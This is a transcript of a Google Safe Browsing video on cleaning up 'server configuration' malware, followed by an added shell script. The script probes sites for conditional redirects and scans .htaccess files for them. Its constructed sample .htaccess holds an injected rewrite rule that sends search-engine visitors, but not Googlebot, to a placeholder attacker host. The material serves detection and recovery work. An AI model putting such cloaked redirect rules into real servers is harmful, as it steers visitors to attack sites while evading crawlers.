[music playing]

Hi. I'm Lucas Ballard. I'm a software engineer at Google, and I work on Google Safe Browsing. I'd like to provide more information for site owners who are notified that their site was infected with malware, specifically with the type "server configuration."

So that we're all on the same page, if your site is infected with malware, you can see sample infected URLs and the type of infection when you verify ownership of your site in Google Webmaster Tools. Google Webmaster Tools can be found at google.com/webmasters. When Webmaster Tools indicates the malware type "server configuration," it often means that the hacker is redirecting visitors from your good site to their attack site by modifying your server's configuration files.

Server configuration files allow the site administrator to specify, among other things, access permissions and URL redirects for specific pages or directories on a website. You can imagine that cybercriminals might modify this file to suit their own needs.

To investigate the specific behavior on your site, log in to Webmaster Tools and browse through the malware section. Make note of the sample URLs listed with malware type "server configuration." These sample URLs are pages that no longer consistently serve your site's good content. Instead, because a cybercriminal likely placed a redirect in the server configuration file, these URLs redirect your users to an attack site.

You can use wget or curl to check for the redirect behavior. Remember, your site will need to be back online first. If the sample URLs copied from Webmaster Tools don't redirect as expected, the hacker may have tried more sophisticated techniques to avoid detection. For example, she may have intended for the redirect to only be given to certain referers or user agents, such as to avoid showing content to automated programs that might detect it. You'll want your wget or curl commands to reflect these possibilities.

To further investigate how your site was affected by malware type "server configuration," log into your web server's file system. In my investigation, I'll use the .htaccess server configuration file. .htaccess is common on many Apache-based web servers, as is httpd.conf. If your web server isn't Apache-based, say it's IIS, then please perform similar tasks with your server's equivalent configuration files.

In the directory where the .htaccess file exists, I'll perform ls -al, or a similar command to view all the files, including hidden files like .htaccess. The .htaccess controls behavior on the current directory and potentially on subdirectories. There may exist more than one server configuration file on your site. You can view relevant server configuration files, perhaps through an editor like vi, and check for unwanted directives such as redirects.

For example, as mentioned earlier, to better hide malicious content, the hacker may have configured conditional redirects based on referer, operating system, user agent, browser, et cetera. Or the hacker may configure redirects to unknown sites, likely malware attack sites. Be sure to check the entire file in case the hacker added their code at the end of the file where she hoped you wouldn't notice.

The sample server configuration URL should have a corresponding rule in the .htaccess file or other server configuration files. When you're ready to clean up your server configuration files, which occurs in the following step of our hacked site recovery process, you can either replace a file with a known good backup, or you can delete the unwanted code from the existing file.

Be aware that only fixing the server configuration file isn't enough. It won't correct the underlying vulnerability that allowed the hacker to compromise your site in the first place. Furthermore, the hacker may have left a back door on your server for future reentry if you fail to delete it. Before finishing the step, be sure to check out our file system damage assessment video to investigate your site for back doors and other harm.

I hope this has been helpful in restoring a healthy server configuration file after a malware infection. Thanks for watching.
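The two checks described in the video, the curl probes with varying referer and user agent and the review of .htaccess for conditional or external redirects, as an added shell example that is not part of the video or of Google's tooling. The User-Agent and Referer values, the attacker host `attacker.example`, and the sample .htaccess written by `write_sample_htaccess` are all constructed for illustration; `probe_redirects` needs curl and network access to the site being checked, while `scan_htaccess` runs offline on any .htaccess file.

```shell
#!/bin/sh
# Added example (not from the video). Two checks for a "server configuration"
# malware notice:
#   probe_redirects URL   - request URL with several User-Agent/Referer pairs,
#                           because an injected rule may only fire for browsers
#                           arriving from a search engine (not for plain curl)
#   scan_htaccess FILE    - list redirect directives with their RewriteCond
#                           lines, flagging external targets and conditions on
#                           HTTP_REFERER / HTTP_USER_AGENT

# -L is deliberately omitted: we want the first hop the rule produces, not the
# end of the chain. Prints label, HTTP status and the Location target, if any.
# The header values below are constructed; adjust to what your visitors send.
probe_redirects() {
    url="$1"
    ua_browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36'
    ua_mobile='Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Safari/604.1'
    # label|user-agent|referer (empty referer means no Referer header is sent)
    probes="plain|curl/8.0|
browser|$ua_browser|
from-google|$ua_browser|https://www.google.com/
mobile-from-google|$ua_mobile|https://www.google.com/"
    printf '%s\n' "$probes" | while IFS='|' read -r label ua ref; do
        set -- -s -o /dev/null -m 15 -A "$ua" -w '%{http_code} %{redirect_url}'
        if [ -n "$ref" ]; then set -- "$@" -e "$ref"; fi
        printf '%-20s %s\n' "$label" "$(curl "$@" "$url")"
    done
}

# Walk the file once: RewriteCond lines are buffered and printed under the
# RewriteRule they belong to; any other directive breaks the chain. A rule is
# marked EXTERNAL-TARGET when it sends users off-site and CONDITIONAL when its
# conditions look at the referer or user agent, the hiding trick the video
# describes. Line numbers let you see rules that were appended at the end.
scan_htaccess() {
    awk '
    tolower($1) == "rewritecond" {
        conds = (conds == "" ? "" : conds "\n") "    " $0; next
    }
    tolower($1) ~ /^(rewriterule|redirect|redirectmatch|redirectpermanent|redirecttemp)$/ {
        target = $NF
        if (target ~ /^\[/) target = $(NF - 1)   # skip trailing [flags]
        flags = ""
        if (target ~ /^https?:\/\//) flags = flags " EXTERNAL-TARGET"
        if (tolower(conds) ~ /http_referer|http_user_agent/) flags = flags " CONDITIONAL"
        if (flags != "") flags = " <--" flags
        printf "%s:%d:%s%s\n", FILENAME, NR, $0, flags
        if (conds != "") print conds
        conds = ""
        next
    }
    NF && $1 !~ /^#/ { conds = "" }
    ' "$1"
}

# Constructed sample: a normal CMS front-controller rewrite followed by an
# injected conditional redirect appended at the end of the file.
write_sample_htaccess() {
    cat > "$1" <<'EOF'
# constructed sample .htaccess
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
Redirect 301 /old-page /new-page

# injected: only visitors arriving from a search engine, and not Googlebot,
# are sent to the attacker's host (attacker.example is a placeholder)
RewriteCond %{HTTP_REFERER} google|bing|yahoo [NC]
RewriteCond %{HTTP_USER_AGENT} !googlebot [NC]
RewriteRule ^(.*)$ http://attacker.example/in.php?q=$1 [R=302,L]
EOF
}

# Usage: sh check_redirects.sh URL [/path/to/.htaccess]
if [ "$#" -gt 0 ]; then
    probe_redirects "$1"
    if [ -n "$2" ]; then scan_htaccess "$2"; fi
fi
```

On the sample file, `scan_htaccess` prints the harmless front-controller rule at line 7 with no flag and the appended rule at line 14 marked `<-- EXTERNAL-TARGET CONDITIONAL`, with its two RewriteCond lines beneath it. Run `probe_redirects` from a machine outside the site's own network, and compare its `from-google` row against the `plain` row: a 301 or 302 that appears only when a browser user agent and a search-engine referer are sent is exactly the behaviour the flagged rule produces.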